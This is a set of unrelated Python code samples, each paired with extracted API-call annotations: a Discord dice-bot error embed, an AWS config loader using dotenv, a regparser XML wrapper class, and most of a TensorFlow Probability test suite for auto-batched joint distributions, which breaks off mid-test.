3897), 'cv2.rectangle', 'cv2.rectangle', (['clone', '(f_left, f_top)', '(f_right, f_bottom)', '(0, 255, 255, 0.5)', '(2)'], {}), '(clone, (f_left, f_top), (f_right, f_bottom), (0, 255, 255, \n 0.5), 2)\n', (3824, 3897), False, 'import cv2\n'), ((3905, 4014), 'cv2.putText', 'cv2.putText', (['image_up', '"""W"""', '(k_left - 170, k_top + 110)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.9)', '(36, 255, 12)', '(2)'], {}), "(image_up, 'W', (k_left - 170, k_top + 110), cv2.\n FONT_HERSHEY_SIMPLEX, 0.9, (36, 255, 12), 2)\n", (3916, 4014), False, 'import cv2\n'), ((4011, 4122), 'cv2.putText', 'cv2.putText', (['image_left', '"""A"""', '(h_left - 170, h_top + 200)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.9)', '(36, 255, 12)', '(2)'], {}), "(image_left, 'A', (h_left - 170, h_top + 200), cv2.\n FONT_HERSHEY_SIMPLEX, 0.9, (36, 255, 12), 2)\n", (4022, 4122), False, 'import cv2\n'), ((4119, 4231), 'cv2.putText', 'cv2.putText', (['image_right', '"""D"""', '(s_left - 170, s_top + 200)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.9)', '(36, 255, 12)', '(2)'], {}), "(image_right, 'D', (s_left - 170, s_top + 200), cv2.\n FONT_HERSHEY_SIMPLEX, 0.9, (36, 255, 12), 2)\n", (4130, 4231), False, 'import cv2\n'), ((4228, 4339), 'cv2.putText', 'cv2.putText', (['image_down', '"""S"""', '(f_left - 170, f_top + 110)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.9)', '(36, 255, 12)', '(2)'], {}), "(image_down, 'S', (f_left - 170, f_top + 110), cv2.\n FONT_HERSHEY_SIMPLEX, 0.9, (36, 255, 12), 2)\n", (4239, 4339), False, 'import cv2\n'), ((4337, 4382), 'cv2.namedWindow', 'cv2.namedWindow', (['"""video"""', 'cv2.WINDOW_AUTOSIZE'], {}), "('video', cv2.WINDOW_AUTOSIZE)\n", (4352, 4382), False, 'import cv2\n'), ((4390, 4416), 'cv2.imshow', 'cv2.imshow', (['"""video"""', 'clone'], {}), "('video', clone)\n", (4400, 4416), False, 'import cv2\n'), ((4542, 4562), 'pyautogui.keyUp', 'pyautogui.keyUp', (['key'], {}), '(key)\n', (4557, 4562), False, 'import pyautogui\n'), ((4783, 4806), 'pyautogui.keyUp', 'pyautogui.keyUp', (['"""left"""'], {}), "('left')\n", (4798, 4806), False, 'import pyautogui\n'), ((5003, 5017), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (5014, 5017), False, 'import cv2\n'), ((4918, 4942), 
'pyautogui.keyUp', 'pyautogui.keyUp', (['"""right"""'], {}), "('right')\n", (4933, 4942), False, 'import pyautogui\n')] |
# pylint: disable=function-redefined
from discord import File
from multipledispatch import dispatch
from fate_of_dice.common import DiceException
from fate_of_dice.resources.resource_handler import ResourceImageHandler
from .dice_embed import DiceEmbed
@dispatch(DiceException)
def from_exception(error: DiceException) -> {DiceEmbed, File}:
embed = DiceEmbed(description=str(error), colour=0xae6229)
embed.add_thumbnail(ResourceImageHandler.INNOVATION_IMAGE)
return {'embed': embed, 'file': embed.thumbnail_file()}
@dispatch(BaseException)
def from_exception(error: BaseException) -> {DiceEmbed, File}:
embed = DiceEmbed(description=str(error), title="Error", colour=0x000000)
embed.add_thumbnail(ResourceImageHandler.PROCESS_IMAGE)
return {'embed': embed, 'file': embed.thumbnail_file()}
| [
"multipledispatch.dispatch"
] | [((257, 280), 'multipledispatch.dispatch', 'dispatch', (['DiceException'], {}), '(DiceException)\n', (265, 280), False, 'from multipledispatch import dispatch\n'), ((533, 556), 'multipledispatch.dispatch', 'dispatch', (['BaseException'], {}), '(BaseException)\n', (541, 556), False, 'from multipledispatch import dispatch\n')] |
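A standalone sketch of how multipledispatch selects between the two from_exception overloads above: the most specific registered type wins, so a DiceException is routed to the first handler and any other exception falls through to the BaseException handler. The toy describe() function below is hypothetical and uses only builtin exception types:
from multipledispatch import dispatch

@dispatch(ValueError)
def describe(err):
    # Specific overload: chosen when the argument is a ValueError.
    return 'value error: ' + str(err)

@dispatch(BaseException)
def describe(err):
    # Fallback overload for every other exception type.
    return 'generic error: ' + str(err)

print(describe(ValueError('bad dice')))  # value error: bad dice
print(describe(RuntimeError('boom')))     # generic error: boom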
import os
from dotenv import load_dotenv
load_dotenv()
AWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID')
AWS_SECRET_KEY = os.getenv('AWS_SECRET_KEY')
AWS_DEFAULT_REGION = os.getenv('AWS_DEFAULT_REGION')
| [
"os.getenv",
"dotenv.load_dotenv"
] | [((42, 55), 'dotenv.load_dotenv', 'load_dotenv', ([], {}), '()\n', (53, 55), False, 'from dotenv import load_dotenv\n'), ((77, 107), 'os.getenv', 'os.getenv', (['"""AWS_ACCESS_KEY_ID"""'], {}), "('AWS_ACCESS_KEY_ID')\n", (86, 107), False, 'import os\n'), ((125, 152), 'os.getenv', 'os.getenv', (['"""AWS_SECRET_KEY"""'], {}), "('AWS_SECRET_KEY')\n", (134, 152), False, 'import os\n'), ((174, 205), 'os.getenv', 'os.getenv', (['"""AWS_DEFAULT_REGION"""'], {}), "('AWS_DEFAULT_REGION')\n", (183, 205), False, 'import os\n')] |
from copy import deepcopy
import six
from lxml import etree
from regparser import plugins
from regparser.tree.xml_parser.preprocessors import replace_html_entities
class XMLWrapper(object):
"""Wrapper around XML which provides a consistent interface shared by both
Notices and Annual editions of XML"""
def __init__(self, xml, source=None):
"""Includes automatic conversion from string and a deep copy for
        safety. `source` represents the provenance of this xml. It is _not_
serialized and hence does not follow the xml through the index"""
if isinstance(xml, six.binary_type):
xml = replace_html_entities(xml)
self.xml = etree.fromstring(xml)
elif isinstance(xml, etree._Element):
self.xml = deepcopy(xml)
else:
raise ValueError("xml should be either binary or an lxml node")
self.source = source
def preprocess(self):
"""Unfortunately, the notice xml is often inaccurate. This function
attempts to fix some of those (general) flaws. For specific issues, we
tend to instead use the files in settings.LOCAL_XML_PATHS"""
for plugin in plugins.instantiate_if_possible(
'eregs_ns.parser.preprocessors', method_name='transform'):
plugin(self.xml)
return self
def xpath(self, *args, **kwargs):
return self.xml.xpath(*args, **kwargs)
def xml_str(self):
return etree.tounicode(self.xml, pretty_print=True)
def _find_or_create(self, tag):
"""Look for the first matching tag present in the document. If it's
not present, create it by inserting it into the root"""
matches = self.xpath('//' + tag)
if matches:
return matches[0]
else:
return etree.SubElement(self.xml, tag)
| [
"copy.deepcopy",
"lxml.etree.SubElement",
"regparser.plugins.instantiate_if_possible",
"regparser.tree.xml_parser.preprocessors.replace_html_entities",
"lxml.etree.fromstring",
"lxml.etree.tounicode"
] | [((1191, 1284), 'regparser.plugins.instantiate_if_possible', 'plugins.instantiate_if_possible', (['"""eregs_ns.parser.preprocessors"""'], {'method_name': '"""transform"""'}), "('eregs_ns.parser.preprocessors',\n method_name='transform')\n", (1222, 1284), False, 'from regparser import plugins\n'), ((1474, 1518), 'lxml.etree.tounicode', 'etree.tounicode', (['self.xml'], {'pretty_print': '(True)'}), '(self.xml, pretty_print=True)\n', (1489, 1518), False, 'from lxml import etree\n'), ((643, 669), 'regparser.tree.xml_parser.preprocessors.replace_html_entities', 'replace_html_entities', (['xml'], {}), '(xml)\n', (664, 669), False, 'from regparser.tree.xml_parser.preprocessors import replace_html_entities\n'), ((693, 714), 'lxml.etree.fromstring', 'etree.fromstring', (['xml'], {}), '(xml)\n', (709, 714), False, 'from lxml import etree\n'), ((1820, 1851), 'lxml.etree.SubElement', 'etree.SubElement', (['self.xml', 'tag'], {}), '(self.xml, tag)\n', (1836, 1851), False, 'from lxml import etree\n'), ((784, 797), 'copy.deepcopy', 'deepcopy', (['xml'], {}), '(xml)\n', (792, 797), False, 'from copy import deepcopy\n')] |
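A small self-contained sketch of the xpath-lookup-or-SubElement-insert pattern used by _find_or_create above, using lxml only (none of the regparser plugin machinery is needed for this):
from lxml import etree

root = etree.fromstring(b'<ROOT><EXISTING/></ROOT>')
print(root.xpath('//EXISTING')[0].tag)  # 'EXISTING' -- already present, nothing created
etree.SubElement(root, 'MISSING')        # missing tag -> appended under the root
print(etree.tounicode(root))             # <ROOT><EXISTING/><MISSING/></ROOT>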
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for the JointDistributionAutoBatched."""
import collections
import os
# Dependency imports
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import test_util
tfb = tfp.bijectors
tfd = tfp.distributions
JAX_MODE = False
Root = tfd.JointDistributionCoroutineAutoBatched.Root
@test_util.test_all_tf_execution_regimes
class JointDistributionAutoBatchedTest(test_util.TestCase):
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_batch_and_event_shape_with_plate(self, jd_class):
models = {}
def coroutine_model():
g = yield tfd.LogNormal(0., 1.)
df = yield tfd.Exponential(1.)
loc = yield tfd.Sample(tfd.Normal(0, g), 20)
yield tfd.StudentT(tf.expand_dims(df, -1), loc, 1)
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.LogNormal(0., 1.),
tfd.Exponential(1.),
lambda _, g: tfd.Sample(tfd.Normal(0, g), 20),
lambda loc, df: tfd.StudentT(tf.expand_dims(df, -1), loc, 1)
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('g', tfd.LogNormal(0., 1.)),
('df', tfd.Exponential(1.)),
('loc', lambda g: tfd.Sample(tfd.Normal(0, g), 20)),
('x', lambda loc, df: tfd.StudentT(tf.expand_dims(df, -1), loc, 1))))
joint = jd_class(models[jd_class], validate_args=True)
# Properties `event_shape` and `batch_shape` should be defined
# even before any sampling calls have occurred.
self.assertAllEqual(joint._model_flatten(joint.event_shape),
[[], [], [20], [20]])
self.assertAllEqual(joint.batch_shape, [])
is_scalar = joint._model_flatten(joint.is_scalar_event())
self.assertAllEqual(is_scalar[0], True)
self.assertAllEqual(is_scalar[1], True)
self.assertAllEqual(is_scalar[2], False)
self.assertAllEqual(is_scalar[3], False)
event_shape = joint._model_flatten(joint.event_shape_tensor())
self.assertAllEqual(event_shape[0], [])
self.assertAllEqual(event_shape[1], [])
self.assertAllEqual(event_shape[2], [20])
self.assertAllEqual(event_shape[3], [20])
self.assertEqual(joint.is_scalar_batch(), True)
batch_shape = joint.batch_shape_tensor()
self.assertAllEqual(batch_shape, [])
@parameterized.named_parameters(
*(dict( # pylint: disable=g-complex-comprehension
testcase_name=jd_type + '_' + sampler_type,
jd_class=getattr(tfd, 'JointDistribution' + jd_type + 'AutoBatched'),
sampler_type=sampler_type)
for jd_type in ('Coroutine', 'Sequential', 'Named')
for sampler_type in ('stateful', 'stateless')))
def test_model_with_nontrivial_batch_shape(self, jd_class, sampler_type):
models = {}
def coroutine_model():
g = yield tfd.LogNormal(0., [1., 2.])
df = yield tfd.Exponential([1., 2.])
loc = yield tfd.Sample(tfd.Normal(0, g), 20)
yield tfd.StudentT(tf.expand_dims(df, -1), loc, 1)
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.LogNormal(0., [1., 2.]),
tfd.Exponential([1., 2.]),
lambda _, g: tfd.Sample(tfd.Normal(0, g), 20),
lambda loc, df: tfd.StudentT(tf.expand_dims(df, -1), loc, 1)
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('g', tfd.LogNormal(0., [1., 2.])),
('df', tfd.Exponential([1., 2.])),
('loc', lambda g: tfd.Sample(tfd.Normal(0, g), 20)),
('x', lambda loc, df: tfd.StudentT(tf.expand_dims(df, -1), loc, 1))))
joint = jd_class(models[jd_class], batch_ndims=1, validate_args=True)
self.assertAllEqual(joint._model_flatten(joint.event_shape),
[[], [], [20], [20]])
self.assertAllEqual(joint.batch_shape, [2])
is_scalar = joint._model_flatten(joint.is_scalar_event())
self.assertAllEqual(is_scalar[0], True)
self.assertAllEqual(is_scalar[1], True)
self.assertAllEqual(is_scalar[2], False)
self.assertAllEqual(is_scalar[3], False)
self.assertAllEqual(joint.is_scalar_batch(), False)
batch_shape = self.evaluate(joint.batch_shape_tensor())
self.assertAllEqual(batch_shape, [2])
x = joint.sample([5], seed=test_util.test_seed(sampler_type=sampler_type))
lp = self.evaluate(joint.log_prob(x))
self.assertAllEqual(lp.shape, [5, 2])
def test_model_with_dynamic_batch_ndims(self):
if tf.executing_eagerly():
self.skipTest('Dynamic shape.')
def coroutine_model():
g = yield tfd.LogNormal(0., [1., 2.])
df = yield tfd.Exponential([1., 2.])
loc = yield tfd.Sample(tfd.Normal(0, g), 20)
yield tfd.StudentT(tf.expand_dims(df, -1), loc, 1)
joint = tfd.JointDistributionCoroutineAutoBatched(
coroutine_model,
batch_ndims=tf1.placeholder_with_default(1, shape=[]),
validate_args=True)
batch_shape_tensor = self.evaluate(joint.batch_shape_tensor())
self.assertAllEqual(batch_shape_tensor, [2])
event_shape_tensor = self.evaluate(joint.event_shape_tensor())
self.assertAllEqual(event_shape_tensor[0], [])
self.assertAllEqual(event_shape_tensor[1], [])
self.assertAllEqual(event_shape_tensor[2], [20])
self.assertAllEqual(event_shape_tensor[3], [20])
self.assertAllEqual(joint.batch_shape, tf.TensorShape(None))
self.assertAllEqual(joint._model_flatten(joint.event_shape),
[tf.TensorShape(None)] * 4)
x = joint.sample([5], seed=test_util.test_seed(sampler_type='stateless'))
lp = self.evaluate(joint.log_prob(x))
self.assertAllEqual(lp.shape, [5, 2])
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'base_jd_class': tfd.JointDistributionCoroutine,
'jda_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'base_jd_class': tfd.JointDistributionSequential,
'jda_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'base_jd_class': tfd.JointDistributionNamed,
'jda_class': tfd.JointDistributionNamedAutoBatched})
def test_broadcast_ragged_batch_shape(self, base_jd_class, jda_class):
base_jd_models = {}
# Writing a JDC with ragged batch shape will broadcast the first
# distribution over the second.
# (though note, this model breaks `log_prob` with nontrivial sample shape).
def coroutine():
x = yield Root(tfd.Normal(0., scale=1.))
yield tfd.Normal(x[..., tf.newaxis], [1., 2., 3., 4., 5.])
base_jd_models[tfd.JointDistributionCoroutine] = coroutine
base_jd_models[tfd.JointDistributionSequential] = [
tfd.Normal(0., scale=1.),
lambda x: tfd.Normal(x[..., tf.newaxis], [1., 2., 3., 4., 5.])
]
base_jd_models[tfd.JointDistributionNamed] = {
'x': tfd.Normal(0., scale=1.),
'y': lambda x: tfd.Normal(x[..., tf.newaxis], [1., 2., 3., 4., 5.])
}
# But we can get equivalent behavior in a JDCA by expanding dims so that
# the batch dimensions line up.
jd_auto_models = {}
def coroutine_auto():
x = yield tfd.Normal(0., scale=[1.])
yield tfd.Normal(x, [1., 2., 3., 4., 5.])
jd_auto_models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_auto
jd_auto_models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.Normal(0., scale=[1.]),
lambda x: tfd.Normal(x, [1., 2., 3., 4., 5.])
]
jd_auto_models[tfd.JointDistributionNamedAutoBatched] = (
collections.OrderedDict((
('x', tfd.Normal(0., scale=[1.])),
('y', lambda x: tfd.Normal(x, [1., 2., 3., 4., 5.])))))
# Writing a JD with ragged batch shape will broadcast the first
# distribution over the second.
# (though note, this model breaks `log_prob` with nontrivial sample shape).
jd_broadcasting = base_jd_class(base_jd_models[base_jd_class])
# This model's broadcasting behavior is a footgun (it can break inference
# routines and cause silently incorrect optimization); it should be
# disallowed by `validate_args`.
    with self.assertRaisesRegex(
Exception,
('Component batch shapes are inconsistent|'
'Broadcasting probably indicates an error in model specification')):
jda_invalid = jda_class(jd_auto_models[jda_class],
batch_ndims=1, validate_args=True)
_ = self.evaluate(jda_invalid.log_prob(
jda_invalid.sample(seed=test_util.test_seed())))
# But, if the user wants to run with no guardrails, one can eke out
# performance wins when evaluating a shared value over multiple models.
jda_broadcasting = jda_class(jd_auto_models[jda_class], batch_ndims=1)
self.assertAllEqual(
jda_broadcasting._model_flatten(jda_broadcasting.event_shape),
[[], []])
self.assertAllEqual(jda_broadcasting.batch_shape, [5])
joint_sample = jda_broadcasting.sample(seed=test_util.test_seed())
x_sample, y_sample = self.evaluate(
list(joint_sample.values()) if hasattr(joint_sample, 'values')
else joint_sample)
# The model samples only a single value for x, shared across the batch.
self.assertAllEqual(x_sample.shape, [1])
self.assertAllEqual(y_sample.shape, [5])
lp_jd_broadcast = self.evaluate(jd_broadcasting.log_prob(
jd_broadcasting._model_unflatten([x_sample[..., 0], y_sample])))
lp_jda_broadcast = self.evaluate(jda_broadcasting.log_prob(
jda_broadcasting._model_unflatten([x_sample, y_sample])))
self.assertAllEqual(lp_jda_broadcast.shape, [5])
self.assertAllEqual(lp_jd_broadcast, lp_jda_broadcast)
# Try drawing multiple samples and computing log-prob.
joint_sample = self.evaluate(jda_broadcasting.sample(
[2, 3], seed=test_util.test_seed()))
lp_jda_broadcast = self.evaluate(jda_broadcasting.log_prob(joint_sample))
self.assertAllEqual(lp_jda_broadcast.shape, [2, 3, 5])
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_log_prob_and_prob_with_plate(self, jd_class):
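    # Compares log_prob/prob of a model containing a Sample plate against a
    # manual computation that sums over the plated dimension.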
models = {}
def coroutine_model():
a = yield tfd.Bernoulli(probs=0.5, dtype=tf.float32)
b = yield tfd.Sample(tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32), 2)
yield tfd.Normal(loc=a, scale=1. + b)
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.Bernoulli(probs=0.5, dtype=tf.float32),
lambda a: tfd.Sample(tfd.Bernoulli( # pylint: disable=g-long-lambda
probs=0.25 + 0.5*a, dtype=tf.float32), 2),
lambda b, a: tfd.Normal(loc=a, scale=1. + b)
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('a', tfd.Bernoulli(probs=0.5, dtype=tf.float32)),
('b', lambda a: tfd.Sample(tfd.Bernoulli( # pylint: disable=g-long-lambda
probs=0.25 + 0.5*a, dtype=tf.float32), 2)),
('c', lambda b, a: tfd.Normal(loc=a, scale=1. + b))))
joint = jd_class(models[jd_class], validate_args=True)
z = self.evaluate(joint.sample(seed=test_util.test_seed()))
a, b, c = z.values() if hasattr(z, 'values') else z
log_prob = self.evaluate(joint.log_prob(z))
prob = self.evaluate(joint.prob(z))
expected_log_prob = self.evaluate(
np.log(0.5) +
tf.reduce_sum(tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 - 0.5 * a))) +
tf.reduce_sum(-0.5 * ((c - a) / (1. + b))**2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b))))
self.assertAllClose(log_prob, expected_log_prob)
self.assertAllClose(prob, np.exp(expected_log_prob))
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_log_prob_multiple_samples(self, jd_class):
models = {}
def coroutine_model():
a = yield tfd.Bernoulli(probs=0.5, dtype=tf.float32)
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.Bernoulli(probs=0.5, dtype=tf.float32),
lambda a: tfd.Bernoulli(probs=0.25 + 0.5*a, dtype=tf.float32),
lambda b, a: tfd.Normal(loc=a, scale=1. + b)
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('a', tfd.Bernoulli(probs=0.5, dtype=tf.float32)),
('b', lambda a: tfd.Bernoulli(probs=0.25 + 0.5*a, dtype=tf.float32)),
('c', lambda b, a: tfd.Normal(loc=a, scale=1. + b))))
joint = jd_class(models[jd_class], validate_args=True)
z = joint.sample(4, seed=test_util.test_seed())
log_prob = joint.log_prob(z)
a, b, c = z.values() if hasattr(z, 'values') else z # pylint: disable=unbalanced-tuple-unpacking
expected_log_prob = (
np.log(0.5) +
tf.math.log(b * (0.25 + 0.5 * a) +
                    (1 - b) * (0.75 - 0.5 * a)) +
-0.5 * ((c - a) / (1. + b)) ** 2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b)))
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_sample_and_log_prob(self, jd_class):
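    # experimental_sample_and_log_prob should match sample() followed by
    # log_prob() while avoiding any bijector inversions during sampling.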
# Define a bijector to detect if/when `inverse` is called.
inverted_values = []
class InverseTracingExp(tfb.Exp):
def _inverse(self, y):
inverted_values.append(y)
return tf.math.log(y)
models = {}
def coroutine_model():
g = yield InverseTracingExp()(tfd.Normal(0., 1.), name='g')
df = yield tfd.Exponential(1., name='df')
loc = yield tfd.Sample(tfd.Normal(0, g), 20, name='loc')
yield tfd.StudentT(df, loc, 1, name='x')
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
InverseTracingExp()(tfd.Normal(0., 1.), name='g'),
tfd.Exponential(1., name='df'),
lambda _, g: tfd.Sample(tfd.Normal(0, g), 20, name='loc'),
lambda loc, df: tfd.StudentT(df, loc, 1, name='x')
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('g', InverseTracingExp()(tfd.Normal(0., 1.))),
('df', tfd.Exponential(1.)),
('loc', lambda g: tfd.Sample(tfd.Normal(0, g), 20)),
('x', lambda loc, df: tfd.StudentT(df, loc, 1))))
joint = jd_class(models[jd_class], validate_args=True)
seed = test_util.test_seed(sampler_type='stateless')
for sample_shape in ([], [5]):
inverted_values.clear()
x1, lp1 = self.evaluate(
joint.experimental_sample_and_log_prob(
sample_shape,
seed=seed,
df=2.7)) # Check that kwargs are supported.
x2 = self.evaluate(
joint.sample(sample_shape, seed=seed, df=2.7))
self.assertAllCloseNested(x1, x2)
self.assertLen(inverted_values, 0)
lp2 = joint.log_prob(x1)
self.assertLen(inverted_values, 1)
self.assertAllClose(lp1, lp2)
@test_util.jax_disable_test_missing_functionality('b/157594634')
def test_sample_distributions(self):
def coroutine_model():
g = yield tfd.Normal(0., 1., name='g')
df = yield tfd.Exponential(1., name='df')
loc = yield tfd.Normal(tf.zeros([20]), g, name='loc')
yield tfd.StudentT(df, loc, 1, name='x')
joint = tfd.JointDistributionCoroutineAutoBatched(coroutine_model)
ds, xs = joint.sample_distributions([4, 3], seed=test_util.test_seed())
for d, x in zip(ds, xs):
self.assertGreaterEqual(len(d.batch_shape), 2)
lp = d.log_prob(x)
self.assertAllEqual(lp.shape[:2], [4, 3])
@test_util.jax_disable_test_missing_functionality('b/201586404')
def test_sample_distributions_not_composite_tensor_raises_error(self):
def coroutine_model():
yield tfd.TransformedDistribution(tfd.Normal(0., 1.),
tfb.Exp(),
name='td')
joint = tfd.JointDistributionCoroutineAutoBatched(coroutine_model)
# Sampling with trivial sample shape avoids the vmap codepath.
ds, _ = joint.sample_distributions([], seed=test_util.test_seed())
self.assertIsInstance(ds[0], tfd.TransformedDistribution)
with self.assertRaisesRegex(
TypeError, r'Some component distribution\(s\) cannot be returned'):
joint.sample_distributions([4, 3], seed=test_util.test_seed())
def test_sample_with_batch_value(self):
@tfd.JointDistributionCoroutineAutoBatched
def dist():
a = yield tfd.Sample(tfd.Normal(0, 1.), 2)
b = yield tfd.Sample(tfd.Normal(0, 1.), 3)
# The following line fails if not autovectorized.
yield tfd.Normal(a[tf.newaxis, ...] * b[..., tf.newaxis], 1.)
x = self.evaluate(dist.sample(123, seed=test_util.test_seed()))
x2 = self.evaluate(dist.sample(value=x, seed=test_util.test_seed()))
self.assertAllCloseNested(x, x2)
# Also test a dict-type value (JDNamed).
dist = tfd.JointDistributionNamedAutoBatched({
'a': tfd.Sample(tfd.Normal(0, 1.), 2),
'b': tfd.Sample(tfd.Normal(0, 1.), 3),
'c': lambda a, b: tfd.Normal( # pylint: disable=g-long-lambda
a[tf.newaxis, ...] * b[..., tf.newaxis], 1.)})
x = self.evaluate(dist.sample(123, seed=test_util.test_seed()))
x2 = self.evaluate(dist.sample(value=x, seed=test_util.test_seed()))
self.assertAllCloseNested(x, x2)
def test_sample_with_value_as_kwarg(self):
@tfd.JointDistributionCoroutineAutoBatched
def dist():
a = yield tfd.Sample(tfd.Normal(0, 1.), 2, name='a')
b = yield tfd.Sample(tfd.Normal(0, 1.), 3, name='b')
# The following line fails if not autovectorized.
yield tfd.Normal(a[tf.newaxis, ...] * b[..., tf.newaxis], 1., name='c')
x = self.evaluate(dist.sample(4, seed=test_util.test_seed()))
x2 = self.evaluate(dist.sample(seed=test_util.test_seed(), a=x.a))
self.assertAllClose(x.a, x2.a)
self.assertAllEqual(x2.b.shape, [4, 3])
self.assertAllEqual(x2.c.shape, [4, 3, 2])
@parameterized.named_parameters(
dict(testcase_name='stateful', sampler_type='stateful'),
dict(testcase_name='stateless', sampler_type='stateless'))
def test_sample_with_partially_specified_value(self, sampler_type):
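    # Pinning some variables (leaving others None) should keep the pinned values
    # and sample the remaining variables with a consistent partial batch shape.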
num_features = 5
def dist():
scale_variance = yield tfd.InverseGamma(0.5, 0.5)
scale_noncentered = yield tfd.Sample(tfd.HalfNormal(1.), num_features)
scale = scale_noncentered * scale_variance[..., None]**0.5
weights_noncentered = yield tfd.Sample(tfd.Normal(0., 1.), num_features)
yield tfd.Deterministic(weights_noncentered * scale)
joint = tfd.JointDistributionCoroutineAutoBatched(dist, validate_args=True)
value_partial_batch_dim = 4
value_ = (3.,
None,
None,
np.ones([value_partial_batch_dim, num_features]))
value = [None if v is None else tf.cast(v, tf.float32) for v in value_]
# The sample should keep the specified values.
xs = self.evaluate(
joint.sample(
value=value, seed=test_util.test_seed(sampler_type=sampler_type)))
self.assertAllEqual(xs[0], tf.fill([value_partial_batch_dim], value[0]))
self.assertAllEqual(xs[1].shape, [value_partial_batch_dim, num_features])
self.assertAllEqual(xs[2].shape, [value_partial_batch_dim, num_features])
self.assertAllEqual(xs[3], value[3])
# With sample shape.
sample_shape = [6, 2]
samples = joint.sample(sample_shape, value=value,
seed=test_util.test_seed(sampler_type=sampler_type))
xs = self.evaluate(samples)
expect_shp = sample_shape + [value_partial_batch_dim, num_features]
self.assertAllEqual(
xs[0], tf.fill(sample_shape + [value_partial_batch_dim], value[0]))
self.assertAllEqual(xs[1].shape, expect_shp)
self.assertAllEqual(xs[2].shape, expect_shp)
self.assertAllEqual(xs[3], value[3] * tf.ones(expect_shp))
sample_shape_dynamic = tf1.placeholder_with_default(
sample_shape, shape=None)
samples = joint.sample(sample_shape_dynamic, value=value,
seed=test_util.test_seed(sampler_type=sampler_type))
xs = self.evaluate(samples)
self.assertAllEqual(
xs[0], tf.fill(sample_shape + [value_partial_batch_dim], value[0]))
self.assertAllEqual(xs[1].shape, expect_shp)
self.assertAllEqual(xs[2].shape, expect_shp)
self.assertAllEqual(xs[3], value[3] * tf.ones(expect_shp))
@parameterized.named_parameters(
dict(testcase_name='stateful', sampler_type='stateful'),
dict(testcase_name='stateless', sampler_type='stateless'))
def test_sample_with_prefix_of_values(self, sampler_type):
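    # A tuple (or namedtuple) value may specify just a leading prefix of the
    # model's variables; the remaining variables are sampled.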
num_rows = 4
num_columns = 5
def dist():
a = yield tfd.Sample(tfd.Normal(0., 1.), num_rows, name='a')
b = yield tfd.Sample(tfd.Normal(0., 1.), num_columns, name='b')
yield tfd.Normal(a[..., None] * b[None, ...], 1., name='c')
tuple_joint = tfd.JointDistributionCoroutineAutoBatched(
dist, validate_args=True)
namedtuple_joint = tfd.JointDistributionCoroutineAutoBatched(
dist,
sample_dtype=collections.namedtuple(
'ModelSpec', ['a', 'b', 'c'])(
a=tf.float32, b=tf.float32, c=tf.float32),
validate_args=True)
value_partial_batch_dim = 3
v0 = 3. * np.ones([value_partial_batch_dim, num_rows]).astype(np.float32)
# Tuple (or namedtuple) value contains only the first variable.
tuple_value = (v0,)
namedtuple_value = collections.namedtuple('ValueSpec', ['a'])(a=v0)
for joint in (tuple_joint, namedtuple_joint):
for value in (tuple_value, namedtuple_value):
